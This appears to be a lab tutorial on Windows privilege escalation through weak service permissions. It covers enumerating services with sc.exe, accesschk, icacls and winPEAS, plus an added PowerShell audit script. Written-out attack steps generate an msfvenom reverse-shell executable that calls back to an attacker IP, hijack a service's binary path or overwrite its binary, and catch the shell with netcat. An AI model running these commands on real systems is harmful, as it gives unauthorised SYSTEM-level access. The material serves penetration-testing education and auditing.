7 - Weak Service Permissions
Weak Permissions on Service Configuration
Weak service configurations and binaries present significant security risks: if a user or group has sufficient permissions on a service, its configuration can be altered.
Viewing Service Configuration
Use the sc.exe command to check a service's configuration:
sc.exe qc SimpleService
Sample Output:
SERVICE_NAME: SimpleService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Quickemu\Downloads\simpleService.exe
SERVICE_START_NAME : LocalSystem
Checking Permissions with AccessChk
AccessChk is a Microsoft Sysinternals utility that shows what kind of access specific users or groups have to resources, including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output (download it from Microsoft Sysinternals).
Then, using accesschk64, we can verify permissions over a service:
.\accesschk64.exe /accepteula -uwcqv SimpleService
Sample Output:
SimpleService
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
The output shows the permissions for each user/group. "SERVICE_ALL_ACCESS" indicates full control over the service; here it is granted only to SYSTEM and Administrators. If a low-privileged user or group had SERVICE_ALL_ACCESS (or SERVICE_CHANGE_CONFIG) instead, it could reconfigure the service.
After checking the configuration, the goal is to change the binary path to point at the malicious executable, then stop and start the service again.
Exploitation Steps
Create a Malicious Executable
Generate a reverse shell payload:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
Modify the Service Executable Path
Change the binpath to point to the malicious binary (note that sc.exe requires a space after the "=" sign):
sc.exe config SimpleService binpath= "C:\Users\Quickemu\Downloads\malicious.exe"
Go into listening mode with netcat on the Linux attacker machine (the connection arrives after the next step):
nc -lvnp 7777
Restart the Service
Restart the service to execute the malicious binary:
sc.exe stop SimpleService
sc.exe start SimpleService
Weak Permissions on Service Binary
If the service binary itself has weak file permissions, it can be overwritten with a malicious executable.
Identifying Service Binaries
List the binary paths of running services:
Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}
Checking Binary Permissions with ICACLS
Use the icacls utility to view file permissions:
icacls .\simpleService.exe
Sample Output:
.\simpleService.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
QUICKEM-5QLQQP9\Quickemu:(F)
If the current user has "Full Control" ((F)), they can overwrite the binary.
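The icacls check above covers one binary at a time. The following PowerShell audit script is an added example (not from the original page or from any tool it cites) that walks every installed service, resolves its on-disk binary from Win32_Service.PathName and reports any write-type ACE granted to a principal outside a trusted set; the $Trusted list is an assumption and should be adjusted to the environment being audited.

```powershell
# Added audit example: flag service binaries writable by untrusted principals.
# Assumes Windows PowerShell 5.1+ and permission to read the binaries' ACLs.
$Trusted = @(
    'NT AUTHORITY\SYSTEM',          # assumed trusted set; adjust as needed
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller'
)
# Any of these rights lets a principal replace or re-ACL the binary.
$WriteLike = 'Write|Modify|FullControl|TakeOwnership|ChangePermissions'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted, unquoted, carry arguments, or use %SystemRoot%.
    $p = [Environment]::ExpandEnvironmentVariables($PathName.Trim())
    if ($p -match '^"([^"]+)"')        { return $Matches[1] }
    if ($p -match '^(.+?\.exe)(\s|$)') { return $Matches[1] }
    return $p
}

function Find-WritableServiceBinary {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
        $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($Trusted -contains $ace.IdentityReference.Value) { continue }
            # Generic-rights ACEs render as raw numbers and are not matched here.
            if ("$($ace.FileSystemRights)" -notmatch $WriteLike) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Binary    = $exe
                Principal = $ace.IdentityReference.Value
                Rights    = "$($ace.FileSystemRights)"
            }
        }
    }
}

# On the host from the page, simpleService.exe would be listed with
# Principal = QUICKEM-5QLQQP9\Quickemu and Rights = FullControl.
Find-WritableServiceBinary | Sort-Object Service | Format-Table -AutoSize
```

A finding is fixed by removing the offending ACE (for example `icacls <binary> /remove:g <principal>`) and, more durably, by installing service binaries under directories such as C:\Program Files that standard users cannot write to.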
Exploitation Steps
Generate and Transfer a Malicious Binary
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
Backup and Replace the Service Binary
cp .\simpleService.exe .\simpleService.exe.bkp
cp .\malicious.exe .\simpleService.exe
Go into listening mode with netcat on the Linux attacker machine (the connection arrives after the next step):
nc -lvnp 7777
Restart the Service
sc.exe stop SimpleService
sc.exe start SimpleService
Service Enumeration with winPEAS
winPEAS is a tool that enumerates potential misconfigurations, including weak service permissions.
Downloading winPEAS
Download the binary:
wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe
Running winPEAS to Enumerate Services
Use the servicesinfo option to gather information about services:
.\winPEASx64.exe quiet servicesinfo
winPEAS will display information about services, including configuration details, permissions, and potential vulnerabilities.
Other Resources
Windows Privilege Escalation Awesome Scripts: https://github.com/peass-ng/PEASS-ng/...
Weak Service Permissions: https://www.ired.team/offensive-secur...
Windows local privilege escalation: https://xorond.com/posts/2021/04/wind...
Service Misconfiguration: https://www.narycyber.com/posts/privi...
Weak Service Permissions: https://juggernaut-sec.com/weak-servi...
Insecure Service Permissions: https://akimbocore.com/article/privil...
Disclaimer
❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗